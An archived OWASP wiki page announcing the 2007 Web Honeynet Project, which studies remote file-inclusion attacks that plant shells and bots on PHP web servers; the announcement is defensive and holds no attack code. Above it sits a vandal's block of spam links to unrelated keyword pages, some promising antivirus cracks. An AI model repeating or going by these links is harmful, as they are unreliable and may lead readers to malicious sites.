This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Announce:Web Honeynet

From OWASP
Revision as of 12:09, 26 May 2009 by Deleted user (talk | contribs)

Jump to: navigation, search

[http://s1.shard.jp/losaul/australia-getaway.html australian sculptor ] [http://s1.shard.jp/bireba/antivirus-f-prot.html symantec antivirus command line ] [http://s1.shard.jp/olharder/automatic-bread.html automotive chameleon paint changes purple to aqua ] [http://s1.shard.jp/olharder/auto-insurance.html auto sales letter of introduction ] [http://s1.shard.jp/olharder/auto-title-services.html automatic vehicle locator ] [http://s1.shard.jp/olharder/autopsy-picture.html dodge cummins with allison automatic transmission ] [http://s1.shard.jp/losaul/midas-mufflers.html australia heartworm ] http [http://s1.shard.jp/losaul/why-do-we-have.html australian business council for sustainable energy ] [http://s1.shard.jp/olharder/autopilot-off-clockwork.html autocad 2007 ] [http://s1.shard.jp/losaul/how-to-train.html australian folk song sheet music ] [http://s1.shard.jp/losaul/when-is-fathers.html australian bounty hunters ] top [http://s1.shard.jp/olharder/auto-benz-dealer.html autocar montreal ] [http://s1.shard.jp/frhorton/bc7zse5ug.html african american love quotes ] [http://s1.shard.jp/bireba/ravantivirus.html symantec antivirus corporate edition update ] morrey auto group [http://s1.shard.jp/galeach/new7.html asian figurine ] [http://s1.shard.jp/losaul/australian-sheepskin.html billiard table removals melbourne australia ] [http://s1.shard.jp/olharder/automatic-guided.html auto loan amortization schedule ] [http://s1.shard.jp/frhorton/pp3b7gffd.html toll gates in south africa ] [http://s1.shard.jp/bireba/mobile-antivirus.html avg antivirus crack serial ] [http://s1.shard.jp/bireba/panda-antivirus.html disable norton antivirus 2003 ] clips of african music [http://s1.shard.jp/olharder/prestige-auto.html ricambi auto volkswagen ] [http://s1.shard.jp/frhorton/77iqsoujy.html south african dancers ] africa aids blocked in [http://s1.shard.jp/olharder/auto-club-country.html diablo dealer auto ] index [http://s1.shard.jp/galeach/new116.html asianavenue.com music ] [http://s1.shard.jp/losaul/australia-zoo.html seek jobs in australia ] [http://s1.shard.jp/olharder/grand-theft-auto.html auto body 101 ] [http://s1.shard.jp/galeach/new56.html longest asian river ] i bless the rains down in africa lyrics [http://s1.shard.jp/galeach/new169.html asians.html index link shaved vitamins206f2.ifrance.com ] [http://s1.shard.jp/frhorton/h4xwn2n8q.html african american church family ] shave asian.com [http://s1.shard.jp/olharder/canadian-auto.html dyno flo performance auto works ] [http://s1.shard.jp/frhorton/qtlusvqfk.html tsala lodge south africa ] [http://s1.shard.jp/bireba/computer-antivirus.html small antivirus program ] [http://s1.shard.jp/olharder/teleflex-automotive.html japan auto exporters ] [http://s1.shard.jp/frhorton/y9my6dqry.html african american free picture ] [http://s1.shard.jp/galeach/new120.html jamasian skate team ] [http://s1.shard.jp/frhorton/q5ck3w5jf.html south africa regions ] [http://s1.shard.jp/galeach/new128.html eurasian plant with daisy like flower heads ] [http://s1.shard.jp/losaul/email-directory.html melburne australia ] [http://s1.shard.jp/bireba/symantec-antivirus.html symentec antivirus updates ] [http://s1.shard.jp/frhorton/lmi1tnyfh.html virgin airways south africa ] http://www.textletoviel.com

Web Honeynet Project Announcement

Posted January 23rd, 2007

The newly formed Web Honeynet Project from SecuriTeam and the ISOTF will in the next few months announce research on real-world web server attacks which infect web servers with: Tools, connect-back shells, bots, downloaders, malware, etc. which are all cross-platform (for web servers) and currently exploited in the wild.

The Web Honeynet Project will, for now, not deal with the regular SQL injection and XSS attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

These attacks form botnets constructed from web servers (mainly IIS and Apache on Linux and Windows servers) and transform hosting farms/colos to attack platforms.

Most of these "tools" are being injected by (mainly) file inclusion attacks against (mainly) PHP web applications, as is well known and established.

PHP (or scripting) shells, etc. have been known for a while, as well as file inclusion (or RFI) attacks, however, mostly as something secondary and not much (if any - save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

The bad guys currently exploit, create botnets and deface in a massive fashion and force ISPs and colos to combat an impossible situation where any (mainly) PHP application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.

What is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) - meaning aside for research, the Web Honeynet Project will also release actionable data on offensive IP addresses, URLs and on the tools themselves to be made available to operational folks, so that they can mitigate the threat.

It's long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. Several folks (and quite loudly - me) have been warning about this for a while, not it's time to take action instead of talk. :)

Note: Below you can find sample statistics on some of the Web Honeynet Project information for this last Wednesday, on file inclusion attacks seeding malware. You will likely notice most of these have been taken care of by now.

The first research on the subject (after looking into several hundred such tools) will be made public in the February edition of the Virus Bulletin magazine, from: Kfir Damari, Noam Rathaus and Gadi Evron (yours truly).

The SecuriTeam and ISOTF Web Honeynet Project would like to thank Beyond Security ( http://www.beyondsecurity.com ) for all the support.

Special thanks (so far) to: Ryan Carter, Randy Vaughn and the rest of the new members of the project.

For more information on the Web Honeynet Project feel free to contact me.

Also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

-- Gadi.